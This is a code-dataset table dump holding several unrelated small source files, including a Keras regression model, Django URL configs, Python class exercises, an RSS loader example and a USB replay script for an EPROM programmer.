blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2
values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 220
values | src_encoding stringclasses 30
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 2 10.3M | extension stringclasses 257
values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
8c4a0168b50f426ab45839426dfa6664e25931d6 | 10af49f1e24311025905b42aa412fb814b7a2c8b | /app/mod_dafd/models/forward_models/NeuralNetModel_keras.py | 04f41a2c9d161b0f1a31329c74efe52402ac7bd3 | [] | no_license | CIDARLAB/neural-optimizer | 192dab49887d11017c2698bfe03663ab4268f229 | 61b43fa20ec9e502539cc95085e991a8fa884735 | refs/heads/master | 2023-02-20T08:52:19.757774 | 2020-07-11T06:32:58 | 2020-07-11T06:32:58 | 233,903,550 | 4 | 1 | null | 2023-02-02T06:42:30 | 2020-01-14T18:02:41 | Python | UTF-8 | Python | false | false | 3,719 | py | """
Created on Fri Nov 23 19:05:38 2018
@author: noushinm
"""
from keras import metrics
from keras.layers import Dense, Activation
from keras.models import Sequential
import matplotlib.pyplot as plt
import numpy as np
# Reading an excel file using Python
from sklearn import model_selection
import pandas as pd
from sklearn.preprocessing import StandardScaler
from keras.callbacks import EarlyStopping
from keras.models import model_from_json
from keras.utils import plot_model
#from keras.utils.vis_utils import plot_model
import sys
from sklearn.neural_network import MLPRegressor
import numpy as np
import os
# root mean squared error (rmse) for regression
def rmse(y_true, y_pred):
from keras import backend
return backend.sqrt(backend.mean(backend.square(y_pred - y_true), axis=-1))
# mean squared error (mse) for regression
def mse(y_true, y_pred):
from keras import backend
return backend.mean(backend.square(y_pred - y_true), axis=-1)
# coefficient of determination (R^2) for regression
def r_square(y_true, y_pred):
from keras import backend as K
SS_res = K.sum(K.square(y_true - y_pred))
SS_tot = K.sum(K.square(y_true - K.mean(y_true)))
return (1 - SS_res/(SS_tot + K.epsilon()))
def r_square_loss(y_true, y_pred):
from keras import backend as K
SS_res = K.sum(K.square(y_true - y_pred))
SS_tot = K.sum(K.square(y_true - K.mean(y_true)))
return 1 - ( 1 - SS_res/(SS_tot + K.epsilon()))
class NeuralNetModel_keras:
regression_model = None
def train_model(self, output_name, regime, features, labels):
model_name = output_name + str(regime)
print(model_name)
# Initialising the ANN
self.regression_model = Sequential()
# Adding the input layer and the first hidden layer
self.regression_model.add(Dense(16, activation = 'relu', input_dim = 8))
# Adding the second hidden layer
self.regression_model.add(Dense(units = 16, activation = 'relu'))
# Adding the third hidden layer
self.regression_model.add(Dense(units = 16, activation = 'relu'))
# Adding the 4th hidden layer
self.regression_model.add(Dense(units = 8, activation = 'relu'))
# Adding the output layer
self.regression_model.add(Dense(units = 1))
# Compiling the NN
self.regression_model.compile(optimizer = 'nadam', loss = 'mean_squared_error',metrics=['mean_squared_error', rmse, r_square] )#metrics=[metrics.mae, metrics.categorical_accuracy]
earlystopping=EarlyStopping(monitor="mean_squared_error", patience=20, verbose=0, mode='auto')
# Fitting the NN to the Training set
train_features = np.stack(features)
train_labels = np.stack(labels)
print(train_labels.shape)
self.regression_model.fit(train_features, train_labels, batch_size = 10, epochs = 500, callbacks=[earlystopping])#
# serialize model to JSON
model_json = self.regression_model.to_json()
with open(os.path.dirname(os.path.abspath(__file__)) + "/saved/" + model_name + ".json", "w") as json_file:
json_file.write(model_json)
# serialize weights to HDF5
self.regression_model.save_weights(os.path.dirname(os.path.abspath(__file__)) + "/saved/" + model_name + ".h5")
def load_model(self, output_name, regime):
model_name = output_name + str(regime)
# load json and create model
json_file = open(os.path.dirname(os.path.abspath(__file__)) + "/saved/" + model_name + ".json", 'r')
loaded_model_json = json_file.read()
json_file.close()
loaded_model = model_from_json(loaded_model_json)
# load weights into new model
loaded_model.load_weights(os.path.dirname(os.path.abspath(__file__)) + "/saved/" + model_name + ".h5")
self.regression_model = loaded_model
def predict(self, features):
return self.regression_model.predict(np.asarray(features).reshape(1, -1))[0]
| [
"mardian@bu.edu"
] | mardian@bu.edu |
de4b196851632d1bba1bc9a91f4a272ca309314c | 03efadf7ad38dc723d51b4e7d5d58c43179d2ef7 | /test/git/test_set_author.py | 8db708eb454a6b556e8c3ee186dac94c76e2989f | [
"Apache-2.0"
] | permissive | sapphon/guet | bff70d5f936736f536909fc939195f736dc2514e | 60872bfb149ad16a3c5309e283a6b886080a13dc | refs/heads/master | 2020-09-05T16:07:27.668793 | 2019-11-07T05:20:35 | 2019-11-07T05:20:35 | 220,151,959 | 0 | 0 | Apache-2.0 | 2019-11-07T04:32:10 | 2019-11-07T04:32:09 | null | UTF-8 | Python | false | false | 765 | py | import unittest
from unittest.mock import patch, MagicMock
from guet.git.set_author import configure_git_author
@patch('guet.git.set_author.subprocess.Popen')
class SetAuthorTest(unittest.TestCase):
def test_should_open_subprocess_to_set_user_name(self, mock_subprocess_popen):
configure_git_author('name', 'email')
mock_subprocess_popen.assert_any_call(['git', 'config', 'user.name', 'name'])
mock_subprocess_popen.return_value.wait.assert_called()
def test_should_open_subprocess_to_set_user_email(self, mock_subprocess_popen):
configure_git_author('name', 'email')
mock_subprocess_popen.assert_any_call(['git', 'config', 'user.email', 'email'])
mock_subprocess_popen.return_value.wait.assert_called()
| [
"chrisboyerdev@gmail.com"
] | chrisboyerdev@gmail.com |
0991be737f49582ec10aa7eedbd0a61d6dfe7b40 | 9b0bdebe81e558d3851609687e4ccd70ad026c7f | /剑指offer/02.从尾到头打印链表.py | c171768fb4cf4ebffccff7c7bf930ebb8b0066c0 | [] | no_license | lizenghui1121/DS_algorithms | 645cdad007ccbbfa82cc5ca9e3fc7f543644ab21 | 9690efcfe70663670691de02962fb534161bfc8d | refs/heads/master | 2022-12-13T22:45:23.108838 | 2020-09-07T13:40:17 | 2020-09-07T13:40:17 | 275,062,257 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 509 | py | """
输入一个链表,按链表从尾到头的顺序返回一个ArrayList。
@Author: Li Zenghui
@Date: 2020-03-02 20:10
"""
# -*- coding:utf-8 -*-
# class ListNode:
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution:
# 返回从尾部到头部的列表值序列,例如[1,2,3]
def printListFromTailToHead(self, listNode):
res = []
p = listNode
while p:
res.insert(0, p.val)
p = p.next
return res | [
"954267393@qq.com"
] | 954267393@qq.com |
4129d51ac3213f7da523015c22e8003135f0791c | 560a8a5909084c2a06739f24c8a354cf4a5700ad | /classes/users.py | a3d90e0319700281a52264d51d18c2ec628da8ae | [] | no_license | Gerg95/learning-python | f20706b16b6c336e259d281c346ef2d2075fb357 | f9c61cf06c89a5ac0725b8a15ba88d48c537744a | refs/heads/master | 2020-03-09T18:35:53.925748 | 2018-05-19T12:50:38 | 2018-05-19T12:50:38 | 128,936,614 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,208 | py | class Users():
def __init__(self,first_name,last_name,email, phone_number, age):
self.first_name = first_name
self.last_name = last_name
self.email = email
self.phone_number = phone_number
self.age = age
self.login_attempts = 0
def describe_user(self):
print("These are the user's details: ")
print(self.first_name)
print(self.last_name)
print(self.email)
print((self.phone_number))
print(str(self.age))
def greet_user(self):
print("Hello " + self.first_name.title() + " " + self.last_name.title())
def increment_login_attempts(self):
self.login_attempts += 1
print(str(self.login_attempts))
def reset_login_attempts(self):
self.login_attempts = 0
print(str(self.login_attempts))
class Admin(Users):
def __init__(self,first_name,last_name,email, phone_number, age):
super().__init__(first_name,last_name,email, phone_number, age)
self.privileges = []
def list_privileges(self):
print("\nPrivileges: ")
for privilege in self.privileges:
print("- " + privilege)
user_1 = Admin('greg','evans','greg@me', 2948920102, 23)
user_1.describe_user()
user_1.privileges = [
'can add post',
'can delete post',
'can ban user']
user_1.list_privileges()
| [
"gregory@Gregorys-MacBook-Air.local"
] | gregory@Gregorys-MacBook-Air.local |
b08c2c670bcb0c5c3ca004b5b5e8ae7656f10ffa | 369b985626c565096a3e65635542ac708339b329 | /blog/urls.py | 9a3cbcfd3770f5beceeffc016a5790b887880504 | [
"MIT"
] | permissive | ernestmucheru/Week4-IP | 9a68b28a127d8746d777d7b67e2cc055d034980c | be80372a33cbc3e80644915db66e0bf51cced175 | refs/heads/main | 2023-06-27T19:45:48.071039 | 2021-07-27T06:34:22 | 2021-07-27T06:34:22 | 389,307,262 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 646 | py | from django.urls import path
# from .views import (PostListView,PostDetailView,PostCreateView,PostUpdateView,PostDeleteView)
from . import views
urlpatterns =[
# path('', PostListView.as_view(), name='blog'),
# path('post/<int:pk>/', PostDetailView.as_view(), name='post-detail'),
# path('post/new/', PostCreateView.as_view(), name='post-create'),
# path('post/<int:pk>/update/', PostUpdateView.as_view(), name='post-update'),
# path('post/<int:pk>/delete/', PostDeleteView.as_view(), name='post-delete'),
path('new-post', views.create_post, name='post'),
path('<hood_id>/new-post', views.create_post, name='post')
] | [
"you@example.com"
] | you@example.com |
9cd53f9956c4f3b83c98600a7487ba52b300ad4d | ee3a4e31fb1b2d466363ec580b69ddd7e272ba39 | /train.py | e7c29064a2477bcf953ae1fed37852ca885e9238 | [] | no_license | sachiel321/LSM_SNU | 6bb3665f71face20083f05c2c14afcab4aff6c6d | d4f48ec81144ee6897d16474bb51dcd76f0d9e93 | refs/heads/master | 2022-12-21T20:04:24.871026 | 2020-09-27T02:04:03 | 2020-09-27T02:04:03 | 298,932,332 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,669 | py | # -*- coding: utf-8 -*-
"""
@author:yym
"""
import torch
import numpy as np
import argparse
from cere.my_cerebellar_model import train_cerebellar
from LSM_SNU.LSM_SNU import train_LSM_SNU
from prefrontal.my_prefrontal_model import train_prefrontal
from coding.coding_and_decoding import seed_everything
from model.combine_rl import train_combine
from model.combine import actor_net
def get_parser():
parser = argparse.ArgumentParser(description='Train network respectively.')
parser.add_argument("--load_model","-l", default=True,action="store_true",
help="Run or not.")
parser.add_argument("--save_model","-s", default=True,action="store_true",
help="Run or not.")
parser.add_argument("--gpu","-g",type=str,default="0",help='Choose GPU number.')
parser.add_argument("--learning_rate","-lr",type=float,default=1e-4)
parser.add_argument("--N_step","-n",type=int,default=2,help='How many step do you want to predict.')
parser.add_argument("--iters","-i",type=int,default=100,help='The training step.')
parser.add_argument("--possion_num","-p",type=int,default=50)
parser.add_argument("--seed","-seed",type=int,default=2)
parser.add_argument("--mode","-m",type=str,default="LSM_SNU",help='You can input LSM_SNU, cerebellar, train_combine and prefrontal to train different part.')
return parser
parser = get_parser()
args = parser.parse_args()
seed_everything(args.seed)
def train(
mode=args.mode,
load_model=args.load_model,
save_model=args.save_model,
gpu = args.gpu,
learning_rate = args.learning_rate,
N_step = args.N_step,
iters = args.iters,
possion_num = args.possion_num):
print("load_model",load_model)
if mode == 'LSM_SNU':
print(N_step)
print(gpu)
train_LSM_SNU(N_step,load_model,save_model,learning_rate,iters,gpu,possion_num)
elif mode == 'cerebellar':
train_cerebellar(load_model,save_model,learning_rate,iters,gpu,possion_num)
elif mode == 'prefrontal':
train_prefrontal(load_model,save_model,learning_rate,iters,gpu,possion_num,N_step)
elif mode == 'train_combine':
train_combine(N_step=N_step,
load_model=load_model,
save_model=save_model,
learning_rate=learning_rate,
iters=iters,
gpu=gpu,
possion_num=possion_num,
speed_limiter=100,
lenth=2 * 1000)
else:
print('Training mode error! Only LSM_SNU, cerebellar and prefrontal are available')
if __name__ == "__main__":
train()
| [
"yangyiming2019@ia.ac.cn"
] | yangyiming2019@ia.ac.cn |
1c5bc689e9b86c0757471afe47e523e15bd47a0a | 38011300c585583103f7fd7236e49225fc0e9fec | /pyshop/pyshop/urls.py | e05e114bb7117e1f576ed07e643cc281b9408dd5 | [
"Apache-2.0"
] | permissive | Fahad-Hafeez/PyShop | ad59ef9c03963bfb433f9072bf3e21a00dbd7adb | 825e55e4da9b9661f91562669c9b2599531fdc3c | refs/heads/main | 2023-03-12T22:33:57.456107 | 2021-03-04T10:36:02 | 2021-03-04T10:36:02 | 344,437,203 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 804 | py | """pyshop URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
urlpatterns = [
path('admin/', admin.site.urls),
path('products/', include('products.urls'))
]
| [
"79376608+Fahad-Hafeez@users.noreply.github.com"
] | 79376608+Fahad-Hafeez@users.noreply.github.com |
9955279f88c832aa48f5df50ed7b9125a8a30059 | f35786637dbe2d9506b677665e369807350625b6 | /Django/basic/config/urls.py | 28baf08b5046a2a566d518e83bd6d9d556444dec | [] | no_license | Hyunta/Ai_course | ffbe563be6c08fe02d8999368949f8db6e39782b | 664c11ea0e190e5b1f60dd1def8f2c2696ddf33c | refs/heads/master | 2023-05-24T06:08:06.054767 | 2021-06-15T02:17:57 | 2021-06-15T02:17:57 | 354,764,700 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 921 | py | """config URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
urlpatterns = [
path('crawl/', include('crawl.urls')),
path('user/', include('user.urls')),
path('bbs/', include ('bbs.urls')),
path('api/', include ('api.urls')),
path('admin/', admin.site.urls),
] | [
"mohai2618@naver.com"
] | mohai2618@naver.com |
3b5f726402c44053f1a64f134f06579925212b87 | c1774024e4bf9f820c2a7f6116f7b6b12a13af18 | /movie/migrations/0001_initial.py | c1c06156a823ff7d497559b32a15d6b50d79f299 | [] | no_license | RezowanTalukder/Django_IMDB_Movie | b9c11fdcb2e2f9c64a6859a7656fc05957049dc4 | 0fcdbe55f473fdd8b4d387bad8aa6b8d67982580 | refs/heads/master | 2021-01-15T06:18:41.199212 | 2020-02-25T03:26:01 | 2020-02-25T03:26:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,141 | py | # Generated by Django 3.0.2 on 2020-02-22 12:10
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Movie',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=100)),
('description', models.TextField(max_length=1000)),
('image', models.ImageField(upload_to='movies')),
('category', models.CharField(choices=[('A', 'ACTION'), ('D', 'DRAMA'), ('C', 'COMEDY'), ('R', 'ROMANCE')], max_length=100)),
('language', models.CharField(choices=[('EN', 'ENGLISH'), ('BN', 'BANGLA')], max_length=100)),
('status', models.CharField(choices=[('RA', 'RECENTLY ADDED'), ('MW', 'MOST WATCHED'), ('TR', 'TOP RATED')], max_length=100)),
('year_of_production', models.DateField()),
('views_count', models.IntegerField(default=0)),
],
),
]
| [
"bsse0933@iit.du.ac.bd"
] | bsse0933@iit.du.ac.bd |
b9ccc72fc32f3a6e7d1b807659400de5b7399661 | 1a7a2c7072059a4da220ca5f4c6d645d796f17ae | /build/scripts-3.6/ex_gRSS.py | cc3530ce8e287e588da677d25a0be3682a8791bf | [
"MIT"
] | permissive | coding-to-music/GatherNews | 5468e127d0e2f401088bae3418513047825dbbcc | 596e4899efc1862cc449b61cfb4496a6af3e2a73 | refs/heads/master | 2021-09-15T08:09:53.800106 | 2018-05-29T02:03:42 | 2018-05-29T02:03:42 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 773 | py | """
========================================
Loading multiple RSS feeds into SQLite3
========================================
An example showing how GatherNews can be used load news articles from
RSS feeds into a database. This example allows you to create new tables
and load a SQLite3 database with News from multiple RSS feeds.
Feel free to contact me if you run into any problems.
"""
print(__doc__)
# Author: Tyler Brown <tylers.pile@gmail.com>
# Import RSS feed capture class
from gathernews.gRSS import CaptureFeeds
# File path to where "feeds_list.txt" is located
file_path = "/home/tyler/code/GatherNews/examples/"
# Instantiate the class
capture_feeds = CaptureFeeds(file_path)
# Create tables, load database, remove duplicates
capture_feeds.load_db()
| [
"tylers.pile@gmail.com"
] | tylers.pile@gmail.com |
2678003eb90b64c0947da9b3472cbce58de7d0fe | ac498910ee746e0a37ef62723a021e60547bbca7 | /compound interest.py | 98b4cee4a945a8ddf8e499e0387907e78ee66aa1 | [] | no_license | RadhaKrishnan75/beginner-python | 6d87514a16a3381815acb535e329495e955a5cce | b4d17979bc895733d75989d6ad14c681c9934c05 | refs/heads/main | 2023-05-02T11:06:51.992486 | 2021-05-16T10:07:20 | 2021-05-16T10:07:20 | 367,829,431 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 320 | py | # Python3 program to find compound
# interest for given values.
def compound_interest(principle, rate, time):
# Calculates compound interest
Amount = principle * (pow((1 + rate / 100), time))
CI = Amount - principle
print("Compound interest is", CI)
# Driver Code
compound_interest(10000, 10.25, 5) | [
"noreply@github.com"
] | RadhaKrishnan75.noreply@github.com |
726752bfca6f44f46e8f9ee2ad690a93e2d90b6a | 22a19102f26c91a194e43fdd51508a820b94cb1a | /VendingMachine.py | 68c05cc825edfc8d6b8416db3ef4a3735656da5c | [] | no_license | zaffron/vending-machine | daccaa1e736f716b048122483a6df5ba269c4385 | dc8ab74433a8a02dfe5fcb8def2c62528b45c1ba | refs/heads/master | 2023-06-25T22:07:58.050568 | 2021-07-20T04:20:27 | 2021-07-20T04:20:27 | 387,670,112 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,695 | py | from tabulate import tabulate
class VendingMachine:
def __init__(self):
self.amount = 0
self.items = []
def addItem(self, item):
self.items.append(item)
def showItems(self):
print("\nCurrently available items:\n")
print("-----------------------------\n")
availableItems = []
for index, item in self.items:
if item.stock != 0:
availableItems.append([index, item.name, item.price])
print(tabulate(availableItems, headers=['Item Number', 'Name', 'Price']))
def addCash(self, cash):
self.amount = self.amount + cash
def buyItem(self, item):
if self.amount < item.price:
print("Item costs more than you provided. Please insert more cash.")
else:
self.amount -= item.price
item.buy()
print(f'You got {item.name}')
print(f'Cash remaining {self.amount}')
def containsItem(self, wantedItem):
hasItem = False
for item in self.items:
if item.stock != 0 && item.name == wantedItem.name:
hasItem = True
break
return has_item
def getItem(self, wantedItem):
gotItem = None
for item in self.items:
if item.stock != 0 && item.name == wantedItem.name:
gotItem = item
break
return gotItem
def insertAmountForItem(self, item):
price = item.price
while self.amount < price:
print('Amount insufficient\n')
print('-----------------------\n')
moreAmount = float(input(f'Insert {price - self.amount}: '))
if moreAmount:
self.amount += moreAmount
def refund(self):
if self.amount > 0:
print('Transation cancelled.\n')
print(f'Cash refunded: {self.amount}')
self.amount = 0 | [
"avinashrijal@gmail.com"
] | avinashrijal@gmail.com |
84df37df94ef3c4a86e883fc459662587a40e5c2 | 10686640b326da3de4e37b08bebd9f7ec7609ca7 | /uvscada/bpm/i87c51/write.py | 05a1a477faa0b38d6118941655ab56c87cb0f289 | [
"BSD-2-Clause"
] | permissive | jshafer817/uvscada | 62e11d136e03968878bcd647c896c32acae23c79 | 206a6c0cbf241b037de1fab47ce6f386d61b7982 | refs/heads/master | 2021-01-18T05:00:32.710552 | 2017-02-26T03:06:34 | 2017-02-26T03:06:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,066 | py | import binascii
import time
import usb1
import libusb1
import sys
import struct
import inspect
from uvscada.usb import usb_wraps
from uvscada.bpm.bp1410_fw import load_fx2
from uvscada.bpm import bp1410_fw_sn, startup
from uvscada.bpm.cmd import bulk2, bulk86
from uvscada.bpm.cmd import sm_read, gpio_readi, led_mask_30, cmd_49, cmd_02, cmd_50, cmd_57s, cmd_57_94, cmd_57_50
from uvscada.bpm.cmd import sm_info0, sm_info1, sm_insert, sn_read, sm_info22, sm_info24, sm_info10
from uvscada.util import str2hex, hexdump
from uvscada.usb import validate_read, validate_readv
import read
import read_fw
import write_fw
class NotBlank(Exception):
pass
def open_dev(usbcontext=None):
if usbcontext is None:
usbcontext = usb1.USBContext()
print 'Scanning for devices...'
for udev in usbcontext.getDeviceList(skip_on_error=True):
vid = udev.getVendorID()
pid = udev.getProductID()
if (vid, pid) == (0x14b9, 0x0001):
print
print
print 'Found device'
print 'Bus %03i Device %03i: ID %04x:%04x' % (
udev.getBusNumber(),
udev.getDeviceAddress(),
vid,
pid)
return udev.open()
raise Exception("Failed to find a device")
# sm scan for large values
# Exception: prefix: wanted 0x08, got 0x2C
'''
TODO: handle better
If you try to program something you can't
(ie a non-erased part)
you'll get
BadPrefix: Wanted prefix 0x18, got 0x08
with reply \x63\x01
'''
def fw_w(dev, fw, verbose=False):
pos = 0
print 'FW load: begin'
tstart = time.time()
while pos < len(fw):
remain = len(fw) - pos
chunk = fw[pos:pos + min(remain, 0xCC)]
if len(chunk) == remain:
prefix = 0x08
reply = "\x00"
else:
prefix = 0x18
reply = "\x0B"
if verbose:
print ' pos 0X%04X, len 0x%02X, prefix 0x%02X' % (pos, len(chunk), prefix)
buff = bulk2(dev,
chr(len(chunk)) + '\x00' + chunk,
target=0x01, prefix=prefix)
validate_read(reply, buff, "packet W: 429/430, R: 431/432")
pos += len(chunk)
tend = time.time()
print 'FW load : end. Took %0.1f sec' % (tend - tstart,)
'''
First one is a program cycle, others are simply
FW load: begin
FW load : end. Took 2.7 sec
FW load: begin
FW load : end. Took 0.1 sec
FW load: begin
FW load : end. Took 0.1 sec
'''
def replay(dev, fw, cont=True, blank=True):
bulkRead, bulkWrite, controlRead, controlWrite = usb_wraps(dev)
# Generated by uvusbreplay 0.1
# uvusbreplay copyright 2011 John McMaster <JohnDMcMaster@gmail.com>
# cmd: /home/mcmaster/bin/usbrply --packet-numbers --no-setup --comment --fx2 --packet-numbers -j cap/2015-10-11/i87c51_13_write_cont_id_blank_v2_ff.cap
# FIXME: size?
read.replay1(dev, cont)
# Generated from packet 363/364
cmd_57s(dev, '\x8C', "\x00\x00")
# Generated from packet 367/368
cmd_50(dev, "\x18\x00")
# Generated from packet 369/370
buff = bulk2(dev,
"\x66\xB8\x01\x2D\x66\x89\x05\x06\x00\x09\x00\x66\xB9\x00\x00\xB2" \
"\x00\xFB\xFF\x25\x44\x11\x00\x00"
, target=0x02)
validate_read("\x8F\x00", buff, "packet W: 369/370, R: 371/372")
# Generated from packet 373/374
buff = bulk2(dev, "\x02", target=0x06)
validate_read("\x90\x00\xB0\x5D\x09\x00", buff, "packet W: 373/374, R: 375/376")
# Generated from packet 377/378
buff = bulk2(dev, "\x57\x8F\x00\x57\x89\x00", target=0x02)
validate_read("\x00\x00", buff, "packet W: 377/378, R: 379/380")
# Generated from packet 381/382
cmd_50(dev, "\x0A\x06")
# Generated from packet 383/384
buff = bulk2(dev, write_fw.p383, target=0x02)
validate_read("\x90\x00", buff, "packet W: 383/384, R: 385/386")
# Generated from packet 387/388
buff = bulk2(dev, "\x02", target=0x06)
validate_read("\x91\x00\xC0\x63\x09\x00", buff, "packet W: 387/388, R: 389/390")
# Generated from packet 391/392
if blank:
print 'Blank checking'
tstart = time.time()
buff = bulk2(dev, "\x08\x00\x57\x90\x00", target=0x02)
tend = time.time()
print 'Blank test took %0.3f sec' % (tend - tstart,)
if buff == "\x00\x00":
print 'Blank: pass'
elif buff == "\x01\x00":
raise NotBlank('Blank: fail')
else:
hexdump(buff)
raise Exception("Unknown blank status")
# Generated from packet 395/396
cmd_57s(dev, '\x8C', "\x00\x00")
# Generated from packet 399/400
cmd_50(dev, "\x18\x00")
# Generated from packet 401/402
buff = bulk2(dev,
"\x66\xB8\x01\x32\x66\x89\x05\x06\x00\x09\x00\x66\xB9\x00\x00\xB2" \
"\x00\xFB\xFF\x25\x44\x11\x00\x00"
, target=0x02)
validate_read("\x91\x00", buff, "packet W: 401/402, R: 403/404")
# Generated from packet 405/406
buff = bulk2(dev, "\x02", target=0x06)
validate_read("\x92\x00\xE0\x63\x09\x00", buff, "packet W: 405/406, R: 407/408")
# Generated from packet 409/410
buff = bulk2(dev, "\x57\x91\x00\x57\x89\x00", target=0x02)
validate_read("\x00\x00", buff, "packet W: 409/410, R: 411/412")
# Generated from packet 413/414
cmd_50(dev, "\x9F\x09")
# Generated from packet 415/416
buff = bulk2(dev, write_fw.p415, target=0x02)
validate_read("\x92\x00", buff, "packet W: 415/416, R: 417/418")
# Generated from packet 419/420
buff = bulk2(dev, "\x02", target=0x06)
validate_read("\x93\x00\x80\x6D\x09\x00", buff, "packet W: 419/420, R: 421/422")
# Generated from packet 423/424
buff = bulk2(dev, "\x57\x92\x00", target=0x01)
validate_read("\x62", buff, "packet W: 423/424, R: 425/426")
# Generated from packet 427/428
# NOTE: prefix 0x18
buff = bulk86(dev, target=0x01, prefix=0x18)
validate_read("\x0B", buff, "packet 427/428")
# Generated from packet 429/430
fw_w(dev, fw, verbose=True)
# Generated from packet 513/514
cmd_57s(dev, '\x8C', "\x00\x00")
# Generated from packet 517/518
cmd_50(dev, "\x18\x00")
# Generated from packet 519/520
buff = bulk2(dev,
"\x66\xB8\x01\x2D\x66\x89\x05\x06\x00\x09\x00\x66\xB9\x00\x00\xB2" \
"\x00\xFB\xFF\x25\x44\x11\x00\x00"
, target=0x02)
validate_read("\x93\x00", buff, "packet W: 519/520, R: 521/522")
# Generated from packet 523/524
buff = bulk2(dev, "\x02", target=0x06)
validate_read("\x94\x00\xA0\x6D\x09\x00", buff, "packet W: 523/524, R: 525/526")
# Generated from packet 527/528
buff = bulk2(dev, "\x57\x93\x00\x57\x89\x00", target=0x02)
validate_read("\x00\x00", buff, "packet W: 527/528, R: 529/530")
# Generated from packet 531/532
cmd_50(dev, "\xE0\x08")
# Generated from packet 533/534
buff = bulk2(dev, write_fw.p533, target=0x02)
validate_read("\x94\x00", buff, "packet W: 533/534, R: 535/536")
# Generated from packet 537/538
buff = bulk2(dev, "\x02", target=0x06)
validate_read("\x95\x00\x80\x76\x09\x00", buff, "packet W: 537/538, R: 539/540")
# Generated from packet 541/542
cmd_57_94(dev)
# Generated from packet 547/548
fw_w(dev, fw)
# Generated from packet 631/632
cmd_57s(dev, '\x8C', "\x00\x00")
# Generated from packet 635/636
cmd_50(dev, "\x18\x00")
# Generated from packet 637/638
buff = bulk2(dev,
"\x66\xB8\x01\x37\x66\x89\x05\x06\x00\x09\x00\x66\xB9\x00\x00\xB2" \
"\x00\xFB\xFF\x25\x44\x11\x00\x00"
, target=0x02)
validate_read("\x95\x00", buff, "packet W: 637/638, R: 639/640")
# Generated from packet 641/642
buff = bulk2(dev, "\x02", target=0x06)
validate_read("\x96\x00\xA0\x76\x09\x00", buff, "packet W: 641/642, R: 643/644")
# Generated from packet 645/646
buff = bulk2(dev, "\x57\x95\x00\x57\x89\x00", target=0x02)
validate_read("\x00\x00", buff, "packet W: 645/646, R: 647/648")
# Generated from packet 649/650
cmd_57_94(dev)
# Generated from packet 655/656
fw_w(dev, fw)
# Generated from packet 739/740
cmd_57s(dev, '\x8C', "\x00\x00")
# Generated from packet 743/744
cmd_50(dev, "\x0D\x00")
# Generated from packet 745/746
buff = bulk2(dev, "\x66\xB9\x00\x00\xB2\x00\xFB\xFF\x25\x44\x11\x00\x00", target=0x02)
validate_read("\x96\x00", buff, "packet W: 745/746, R: 747/748")
# Generated from packet 749/750
buff = bulk2(dev, "\x02", target=0x06)
validate_read("\x97\x00\xB0\x76\x09\x00", buff, "packet W: 749/750, R: 751/752")
# Generated from packet 753/754
cmd_57_50(dev, "\x96", "\x1A\x00")
# Generated from packet 755/756
buff = bulk2(dev,
"\x66\xB9\x00\x00\xB2\x02\xFB\xFF\x25\x44\x11\x00\x00\x66\xB9\x00" \
"\x00\xB2\x02\xFB\xFF\x25\x44\x11\x00\x00"
, target=0x02)
validate_read("\x97\x00", buff, "packet W: 755/756, R: 757/758")
# Generated from packet 759/760
buff = bulk2(dev, "\x02", target=0x06)
validate_read("\x98\x00\xD0\x76\x09\x00", buff, "packet W: 759/760, R: 761/762")
# Generated from packet 763/764
buff = bulk2(dev, "\x57\x97\x00", target=0x02)
validate_read("\x00\x00", buff, "packet W: 763/764, R: 765/766")
# Generated from packet 767/768
led_mask_30(dev, "pass")
# Generated from packet 771/772
gpio_readi(dev)
# Generated from packet 775/776
gpio_readi(dev)
# Generated from packet 779/780
sm_info22(dev)
# Generated from packet 783/784
sm_info24(dev)
# Generated from packet 787/788
sm_read(dev)
# Generated from packet 791/792
cmd_49(dev)
# Generated from packet 795/796
sm_read(dev)
# Generated from packet 799/800
sm_insert(dev)
# Generated from packet 803/804
sm_info10(dev)
| [
"JohnDMcMaster@gmail.com"
